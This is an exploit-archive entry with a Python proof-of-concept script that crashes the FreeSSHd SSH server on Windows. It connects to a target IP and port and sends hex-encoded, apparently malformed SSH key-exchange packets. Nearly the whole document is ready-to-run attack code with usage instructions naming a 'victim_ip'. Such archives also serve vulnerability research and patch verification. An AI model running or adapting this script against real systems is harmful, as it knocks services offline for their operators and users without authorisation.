FreeSSHd Remote Denial of Service

2011-12-24T00:00:00
ID 1337DAY-ID-17299
Type zdt
Reporter Level
Modified 2011-12-24T00:00:00

Description

Exploit for windows platform in category dos / poc

                                        
                                            import sys, socket, binascii
print "\n" 
print "----------------------------------------------------------------"
print "|      FreeSSHd, Remote Denial of Service                       |"
print "|      Level, Smash the Stack                                   |"
print "----------------------------------------------------------------"
print "\n"
buf = [
 ("5353482d322e302d50755454595f4b695454590d0a0000027c065a3db5f2230f6aed834d36a6fa8"
 "55b1f140000009a6469666669652d68656c6c6d616e2d67726f75702d65786368616e67652d73686"
 "13235362c6469666669652d68656c6c6d616e2d67726f75702d65786368616e67652d736861312c6"
 "469666669652d68656c6c6d616e2d67726f757031342d736861312c6469666669652d68656c6c6d6"
 "16e2d67726f7570312d736861312c727361323034382d7368613235362c727361313032342d73686"
 "1310000000f7373682d7273612c7373682d6473730000009f6165733235362d6374722c616573323"
 "5362d6362632c72696a6e6461656c2d636263406c797361746f722e6c69752e73652c61657331393"
 "22d6374722c6165733139322d6362632c6165733132382d6374722c6165733132382d6362632c626"
 "c6f77666973682d6374722c626c6f77666973682d6362632c336465732d6374722c336465732d636"
 "2632c617263666f75723235362c617263666f75723132380000009f6165733235362d6374722c616"
 "5733235362d6362632c72696a6e6461656c2d636263406c797361746f722e6c69752e73652c61657"
 "33139322d6374722c6165733139322d6362632c6165733132382d6374722c6165733132382d63626"
 "32c626c6f77666973682d6374722c626c6f77666973682d6362632c336465732d6374722c3364657"
 "32d6362632c617263666f75723235362c617263666f75723132380000001f686d61632d736861312"
 "c686d61632d736861312d39362c686d61632d6d64350000001f686d61632d736861312c686d61632"
 "d736861312d39362c686d61632d6d6435000000096e6f6e652c7a6c6962000000096e6f6e652c7a6"
 "c696200000000000000000000000000aac55b402546"),
 ("0000010c061e000001005e04d639ec531b5b8623f7ea733be6cc59d6439a40bbca110e1c2d45902"
 "46cc2ef5deb76623f30c6181112c168ba4f1d253a6aebe45b6a5c496b59894233f4991c8969b68d4"
 "3261e03d768dccda76f935f185b3168626d07a3c496cfb760e3fba82fd10dd309fec54a67bbbb294"
 "5f316080d27768743c975d90728fc87b5b33774ed6e2ebf6106001d4f3342a8a83fd501b6b7cc7ac"
 "e537f3bb83f2f0ff21af624f9353ab3e1ee2c5eebd9b5c36579656ad5a5fec779c88665abf1ced55"
 "b8aa6272860e58c6c4482c1b83020e270487cf96b5cffffffff60534d770a69bcc1c71963827ba6e"
 "3fb8a0c06f3bf64c3d426e67d00d90c679ee26388d2ef69f7357f9b2a688b4527")
 ]
def usage(): 
        print "usage  : ./freesshd.py <victim_ip>  <victim_port>"
        print "example: ./freesshd.py 192.168.1.22 22"   
def main():  
    if len(sys.argv) != 3: 
            usage() 
            sys.exit() 
    
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
    
    HOST = sys.argv[1] 
    PORT = int(sys.argv[2]) 
    s.connect((HOST,PORT)) 
    data = s.recv(1024) 
    print data 
    print "[*] Sending Payload...\n"
    for i in range(0,len(buf)):
 s.send(binascii.unhexlify(buf[i]))
    print "[*] Closing Socket...\n"
    s.close() 
if __name__ == "__main__": 
    main()



#  0day.today [2018-01-01]  #